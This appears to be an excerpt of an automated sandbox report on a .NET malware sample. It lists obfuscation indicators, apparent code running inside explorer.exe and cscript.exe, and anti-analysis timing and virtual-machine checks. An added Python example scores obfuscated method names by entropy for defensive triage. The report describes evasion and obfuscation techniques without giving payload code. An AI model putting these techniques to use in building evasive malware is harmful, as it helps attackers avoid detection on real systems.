          Source: Binary string: cscript.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yPURXYpFVuXra2o.exe, yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: yPURXYpFVuXra2o.exe, BuscarVentas.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | .Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | .Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | .Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.2febbdc.6.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.74f0000.13.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.130ff840.0.raw.unpack, BuscarVentas.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0040AA82 LoadLibraryW,GetProcAddress,FreeLibrary | 7_2_0040AA82
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00417AB7 push cs; iretd | 5_2_00417ACC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00416CFD push edi; ret | 5_2_00416CFE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041D4B5 push eax; ret | 5_2_0041D508
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041D56C push eax; ret | 5_2_0041D572
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041D502 push eax; ret | 5_2_0041D508
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041D50B push eax; ret | 5_2_0041D572
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041E5A5 push ds; ret | 5_2_0041E5A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017D21AD pushad ; retf 0004h | 5_2_017D223F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017D97A1 push es; iretd | 5_2_017D97A8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018008CD push ecx; mov dword ptr [esp], ecx | 5_2_018008D6
          Source: C:\Windows\explorer.exe | Code function: 6_2_110E29B5 push esp; retn 0000h | 6_2_110E2AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_110E2B02 push esp; retn 0000h | 6_2_110E2B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_110E2B1E push esp; retn 0000h | 6_2_110E2B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_116889B5 push esp; retn 0000h | 6_2_11688AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_11688B02 push esp; retn 0000h | 6_2_11688B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_11688B1E push esp; retn 0000h | 6_2_11688B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_139749B5 push esp; retn 0000h | 6_2_13974AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_13974B1E push esp; retn 0000h | 6_2_13974B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_13974B02 push esp; retn 0000h | 6_2_13974B03
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0040DF11 push ecx; ret | 7_2_0040DF24
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051897A1 push es; iretd | 7_2_051897A8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051821AD pushad ; retf 0004h | 7_2_0518223F
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051B08CD push ecx; mov dword ptr [esp], ecx | 7_2_051B08D6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301D502 push eax; ret | 7_2_0301D508
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301D50B push eax; ret | 7_2_0301D572
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301D56C push eax; ret | 7_2_0301D572
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301E5A5 push ds; ret | 7_2_0301E5A6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301E42D push edi; ret | 7_2_0301E42F
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301E43F push edi; ret | 7_2_0301E441
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301D4B5 push eax; ret | 7_2_0301D508
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_03017AB7 push cs; iretd | 7_2_03017ACC
          Source: yPURXYpFVuXra2o.exe | Static PE information: section name: .text entropy: 7.625137960095419
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, nfbcuHVRZYUkLRlB48.csHigh entropy of concatenated method names: 'E0Qy00jsNo', 'uPuyw5XE2D', 'zl9MdbnpUn', 'O3IMqDnstD', 'TfmMQlck17', 'S2PMlBonFq', 'isIMFglKSI', 'CHHMsJHUfA', 'Y1KMI8cHpT', 'hp0MA746Ts'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, oerYe9nG7jNn8seA7q.csHigh entropy of concatenated method names: 'JFBMP3uO4u', 'jWBMjAKYwg', 'sE3MWw3YHF', 'kW0MnKwG9o', 'NgPMEvipgK', 'j7kMGiQXnH', 'RZ9MmknHkb', 'jJUMkfuIUq', 'GCIMJI8yLT', 'hS9MOdd1Pw'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, PpfYfgodU401qo7Lpm.csHigh entropy of concatenated method names: 'xloeG0Bru', 'YPxPSR9D5', 'lFIj2CN4p', 'rx7wuV5YS', 'Qokn7WGWo', 'iA2VqslUk', 'J9eFeYaY60ogxdauXX', 'YR68HfPAm5mYiuXrbd', 'YpVkd9Sit', 'W6LOUj0so'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, T67RTEldD6gRCu4UHx.csHigh entropy of concatenated method names: 'cSw5iTo7gb', 'ltJ5r25J48', 'r2s5vpvmui', 'ToString', 'LGb5DMlkZ9', 'RA85RPsEkI', 'k0Wq8tB6dHm4FgLamhD', 'COO27XBq9Z8VnYmfsxK'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, FTnamxBWHIJsI2vsTR.csHigh entropy of concatenated method names: 'Y8FJ4sypVJ', 'qHLJUkPSjT', 'DfJJHnHn7X', 'OOmJ9uVG7p', 'Q1MJcvaL0E', 'zitJykUjX9', 'UElJ55g1tp', 'YF1kRgiE9j', 'KCtkgHOhs5', 'AhTkKmLHHn'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, j5YhcCSwBm4tqgWkb6.csHigh entropy of concatenated method names: 'jLv5NqZVMQ', 'bMg5cbWqoX', 'v0y5yOSWfb', 'wIF5Xj3304', 'zRc566ZEKI', 'feLyvwQ4E3', 'v6kyDv4aIm', 'AtmyRPk0LT', 'D4qygLhEIt', 'pIEyKEPbp2'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, vCPwVtcITDW9hLOASV.csHigh entropy of concatenated method names: 'Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP', 'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht', 'lwHooSTnam'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csHigh entropy of concatenated method names: 'zUbUNuZPRX', 'NRtU95TIRR', 'WqPUc9n9I8', 'lnwUMcoS07', 'DsCUyZ6ACU', 'oiAU5luSSk', 'JPLUX1CaGg', 'ugBU6quxU6', 'WK8UptFqlp', 'n9aUCOKGZa'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.csHigh entropy of concatenated method names: 'WkacY3tWnW', 'rNec7T6FOC', 'AdTciEOR6r', 'PSicrvmwxh', 'dF1cv6aWu9', 'e28cD8LVC1', 'HoAcRx79eI', 'js9cgAET6N', 'uWwcKuaZ8V', 'D0GcB0akx2'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, cs7hWL4brPTs6hwVWeX.csHigh entropy of concatenated method names: 'l3VJ1bgXTu', 'Gd0JaZIPhn', 'OR8JerVmLi', 'FXrJPQ4QWP', 'J9BJ02v5LC', 'J4cJjIrn5t', 'yNtJwVTYAo', 'ALLJWJ3LqI', 'DLhJnOOTRa', 'Gh3JVZdQgF'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, gepjJKKT6ifJ7htpwH.csHigh entropy of concatenated method names: 'wbgkSWpm15', 'XJUkhqVLIN', 'bYqkdgZwQM', 'muZkqvEXMj', 'A3nkYHILHD', 'RtakQZbX0Y', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Hph3XCHfa2weuYqlUh.csHigh entropy of concatenated method names: 'eDB4X2xY0T', 'b6h46lUdOF', 'fG74CjNn8s', 'zA74uqufbc', 'WlB4E4855Y', 'HcC4GwBm4t', 'kis5WaZj28DBFFF7iM', 'NIuBibovWYuofC5BOt', 'yXw44XidEb', 'LGb4UQskAQ'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, LtTDvB4U3GTbSUTyrDW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0DOYg5ACd', 'bomO76OIT2', 'y5SOiZQsHk', 'gP0OruPclf', 'jnKOv99cUT', 'saBODbcvOU', 'oemORmRcLU'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, e71uUHZabblQaysFKP.csHigh entropy of concatenated method names: 'WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm', 'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF', 'zU53AlfG6V', 'tEb3LoI0T1'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Xy75HigPLynxUk8tVy.csHigh entropy of concatenated method names: 'fTnk9n0mML', 'lgWkc0yDXc', 'iHpkMQT4su', 'xOskyc1VDR', 'aaBk5nUBvV', 'OWmkXtrcSr', 'o13k6Mdqo6', 'fPVkplpQTt', 'GJLkCVdTBx', 'AYBkuVmU0M'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, ivabNJIhnbOdkS7rrr.csHigh entropy of concatenated method names: 'o1qX1oJVTN', 'B9oXamdYkC', 'B8XXeRYNPB', 'MOUXP4OBAy', 'nP5X0BQfkF', 'nKbXjW4VvV', 'xGCXwYsiyZ', 'ygqXWSac3I', 'Jy6XnoAFUn', 'xtFXV08hQV'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, cSTkKnzu2HtwIbII1D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qYbJ3NV0wM', 'XccJEmKgpy', 'r0KJGDnVlG', 'TQMJmvjmvK', 'fERJkraUxu', 'DGhJJOfTHF', 'knEJORKHuy'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, jSdj7uDf7R3NOvSWKI.csHigh entropy of concatenated method names: 'cwemgCHmSA', 'DKUmBx45SN', 'UMOkbY6cRg', 'Yc1k4NHj9u', 'YILmLHm7Aw', 'd8Jm8FojyM', 'BAPmZSkCNo', 'PtumYxUQQB', 'Hxqm70LOeV', 'z4NmiGRYIB'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, nfbcuHVRZYUkLRlB48.cs | High entropy of concatenated method names: 'E0Qy00jsNo', 'uPuyw5XE2D', 'zl9MdbnpUn', 'O3IMqDnstD', 'TfmMQlck17', 'S2PMlBonFq', 'isIMFglKSI', 'CHHMsJHUfA', 'Y1KMI8cHpT', 'hp0MA746Ts'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, oerYe9nG7jNn8seA7q.cs | High entropy of concatenated method names: 'JFBMP3uO4u', 'jWBMjAKYwg', 'sE3MWw3YHF', 'kW0MnKwG9o', 'NgPMEvipgK', 'j7kMGiQXnH', 'RZ9MmknHkb', 'jJUMkfuIUq', 'GCIMJI8yLT', 'hS9MOdd1Pw'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, PpfYfgodU401qo7Lpm.cs | High entropy of concatenated method names: 'xloeG0Bru', 'YPxPSR9D5', 'lFIj2CN4p', 'rx7wuV5YS', 'Qokn7WGWo', 'iA2VqslUk', 'J9eFeYaY60ogxdauXX', 'YR68HfPAm5mYiuXrbd', 'YpVkd9Sit', 'W6LOUj0so'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, T67RTEldD6gRCu4UHx.cs | High entropy of concatenated method names: 'cSw5iTo7gb', 'ltJ5r25J48', 'r2s5vpvmui', 'ToString', 'LGb5DMlkZ9', 'RA85RPsEkI', 'k0Wq8tB6dHm4FgLamhD', 'COO27XBq9Z8VnYmfsxK'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, FTnamxBWHIJsI2vsTR.cs | High entropy of concatenated method names: 'Y8FJ4sypVJ', 'qHLJUkPSjT', 'DfJJHnHn7X', 'OOmJ9uVG7p', 'Q1MJcvaL0E', 'zitJykUjX9', 'UElJ55g1tp', 'YF1kRgiE9j', 'KCtkgHOhs5', 'AhTkKmLHHn'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, j5YhcCSwBm4tqgWkb6.cs | High entropy of concatenated method names: 'jLv5NqZVMQ', 'bMg5cbWqoX', 'v0y5yOSWfb', 'wIF5Xj3304', 'zRc566ZEKI', 'feLyvwQ4E3', 'v6kyDv4aIm', 'AtmyRPk0LT', 'D4qygLhEIt', 'pIEyKEPbp2'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, vCPwVtcITDW9hLOASV.cs | High entropy of concatenated method names: 'Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP', 'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht', 'lwHooSTnam'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | High entropy of concatenated method names: 'zUbUNuZPRX', 'NRtU95TIRR', 'WqPUc9n9I8', 'lnwUMcoS07', 'DsCUyZ6ACU', 'oiAU5luSSk', 'JPLUX1CaGg', 'ugBU6quxU6', 'WK8UptFqlp', 'n9aUCOKGZa'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | High entropy of concatenated method names: 'WkacY3tWnW', 'rNec7T6FOC', 'AdTciEOR6r', 'PSicrvmwxh', 'dF1cv6aWu9', 'e28cD8LVC1', 'HoAcRx79eI', 'js9cgAET6N', 'uWwcKuaZ8V', 'D0GcB0akx2'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, cs7hWL4brPTs6hwVWeX.cs | High entropy of concatenated method names: 'l3VJ1bgXTu', 'Gd0JaZIPhn', 'OR8JerVmLi', 'FXrJPQ4QWP', 'J9BJ02v5LC', 'J4cJjIrn5t', 'yNtJwVTYAo', 'ALLJWJ3LqI', 'DLhJnOOTRa', 'Gh3JVZdQgF'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, gepjJKKT6ifJ7htpwH.cs | High entropy of concatenated method names: 'wbgkSWpm15', 'XJUkhqVLIN', 'bYqkdgZwQM', 'muZkqvEXMj', 'A3nkYHILHD', 'RtakQZbX0Y', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Hph3XCHfa2weuYqlUh.cs | High entropy of concatenated method names: 'eDB4X2xY0T', 'b6h46lUdOF', 'fG74CjNn8s', 'zA74uqufbc', 'WlB4E4855Y', 'HcC4GwBm4t', 'kis5WaZj28DBFFF7iM', 'NIuBibovWYuofC5BOt', 'yXw44XidEb', 'LGb4UQskAQ'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, LtTDvB4U3GTbSUTyrDW.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0DOYg5ACd', 'bomO76OIT2', 'y5SOiZQsHk', 'gP0OruPclf', 'jnKOv99cUT', 'saBODbcvOU', 'oemORmRcLU'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, e71uUHZabblQaysFKP.cs | High entropy of concatenated method names: 'WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm', 'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF', 'zU53AlfG6V', 'tEb3LoI0T1'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Xy75HigPLynxUk8tVy.cs | High entropy of concatenated method names: 'fTnk9n0mML', 'lgWkc0yDXc', 'iHpkMQT4su', 'xOskyc1VDR', 'aaBk5nUBvV', 'OWmkXtrcSr', 'o13k6Mdqo6', 'fPVkplpQTt', 'GJLkCVdTBx', 'AYBkuVmU0M'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, ivabNJIhnbOdkS7rrr.cs | High entropy of concatenated method names: 'o1qX1oJVTN', 'B9oXamdYkC', 'B8XXeRYNPB', 'MOUXP4OBAy', 'nP5X0BQfkF', 'nKbXjW4VvV', 'xGCXwYsiyZ', 'ygqXWSac3I', 'Jy6XnoAFUn', 'xtFXV08hQV'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, cSTkKnzu2HtwIbII1D.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qYbJ3NV0wM', 'XccJEmKgpy', 'r0KJGDnVlG', 'TQMJmvjmvK', 'fERJkraUxu', 'DGhJJOfTHF', 'knEJORKHuy'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, jSdj7uDf7R3NOvSWKI.cs | High entropy of concatenated method names: 'cwemgCHmSA', 'DKUmBx45SN', 'UMOkbY6cRg', 'Yc1k4NHj9u', 'YILmLHm7Aw', 'd8Jm8FojyM', 'BAPmZSkCNo', 'PtumYxUQQB', 'Hxqm70LOeV', 'z4NmiGRYIB'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack | High entropy of concatenated method names: the same 18 classes (nfbcuHVRZYUkLRlB48.cs through jSdj7uDf7R3NOvSWKI.cs) with the same method names as listed for 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack above; the 18 identical rows are consolidated here
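The "high entropy of concatenated method names" rows above are the output of a simple heuristic: a .NET renaming obfuscator replaces member names with random alphanumeric strings, so the character distribution of all method names of a class joined together is far flatter than that of hand-written identifiers. The readable names that survive in the listings (CanConvertFrom, ConvertTo, ToString, Dispose, ProcessDialogKey, Next, NextBytes) are overrides of framework virtuals and interface members that a renamer has to leave alone so the runtime can still bind them. The following Python is an added example written for this page, not code from Joe Sandbox; it recomputes the heuristic over method names copied from two classes listed above and over a constructed benign control. The 5.0-bit cut-off is an assumption of this example (the report does not state Joe Sandbox's threshold), and the set of framework override names is the one visible in these rows.

```python
import math
from collections import Counter

# Method names copied from two of the classes listed in the report above: one
# class whose members are all renamed, and one that keeps two readable names.
OBFUSCATED = ['WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm',
              'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF',
              'zU53AlfG6V', 'tEb3LoI0T1']
MIXED = ['Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP',
         'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht',
         'lwHooSTnam']
# Constructed control: the member names an unobfuscated .NET class might have.
BENIGN = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToString', 'Dispose',
          'GetHashCode', 'Equals', 'ProcessDialogKey', 'Next', 'NextBytes']

# Names a renaming obfuscator has to leave alone because they override
# framework virtuals or implement interface members the runtime binds by
# name; these are the readable names that survive in the report's listings.
FRAMEWORK_OVERRIDES = {'ToString', 'Dispose', 'Equals', 'GetHashCode',
                       'CanConvertFrom', 'ConvertFrom', 'ConvertTo',
                       'ProcessDialogKey', 'Next', 'NextBytes'}

# Cut-off used here for "high entropy"; Joe Sandbox's own threshold is not
# given on the page, so this value is an assumption of this example.
ENTROPY_THRESHOLD = 5.0


def shannon_entropy(text):
    """Shannon entropy of the string in bits per character (0.0 if empty)."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def assess_class(method_names, threshold=ENTROPY_THRESHOLD):
    """Score one class the way the signature does (entropy of all method
    names concatenated) and add two supporting signals for triage."""
    entropy = shannon_entropy("".join(method_names))
    with_digits = sum(any(ch.isdigit() for ch in m) for m in method_names)
    return {
        "entropy": round(entropy, 3),
        "flagged": entropy >= threshold,
        # Digits inside identifiers are rare in hand-written C# but are the
        # normal output of renamers drawing from an alphanumeric alphabet.
        "digit_ratio": with_digits / len(method_names) if method_names else 0.0,
        "surviving_overrides": sorted(set(method_names) & FRAMEWORK_OVERRIDES),
    }


def triage(classes):
    """Map class file name -> assessment for a report's worth of classes."""
    return {name: assess_class(names) for name, names in classes.items()}


if __name__ == "__main__":
    for name, result in triage({"e71uUHZabblQaysFKP.cs": OBFUSCATED,
                                "vCPwVtcITDW9hLOASV.cs": MIXED,
                                "Control.cs": BENIGN}).items():
        print(name, result)
```

The fully renamed class scores about 5.35 bits per character and every one of its names carries a digit; the benign control scores about 4.48 bits, which is ordinary for English-derived identifiers. The surviving-override list is the useful secondary signal: it tells you what the obfuscated class actually is (a TypeConverter, a Random subclass, a Control) without decompiling it.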
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Process information set: NOOPENFILEERRORBOX (47 identical rows)
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 15C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 2F80000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 2DD0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 7500000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 6E80000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 8500000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Memory allocated: 7010000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 240000
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9865
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 893
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 864
          Source: C:\Windows\SysWOW64\cscript.exe | Window / User API: threadDelayed 9289
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | API coverage: 2.0 %
          Source: C:\Windows\SysWOW64\cscript.exe | API coverage: 1.4 %
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 7244 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2208 | Thread sleep count: 107 > 30
          Source: C:\Windows\explorer.exe TID: 2208 | Thread sleep time: -214000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2208 | Thread sleep count: 9865 > 30
          Source: C:\Windows\explorer.exe TID: 2208 | Thread sleep time: -19730000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608 | Thread sleep count: 123 > 30
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608 | Thread sleep time: -246000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608 | Thread sleep count: 9289 > 30
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608 | Thread sleep time: -18578000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed (2 identical rows)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00412674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,7_2_00412674
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Thread delayed: delay time: 240000
          Source: explorer.exe, 00000006.00000003.31961855101.0000000009080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31966305663.0000000009095000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009080000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\ksfilter.inf_loc
          Source: explorer.exe, 00000006.00000000.30301008086.000000000C580000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C580000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
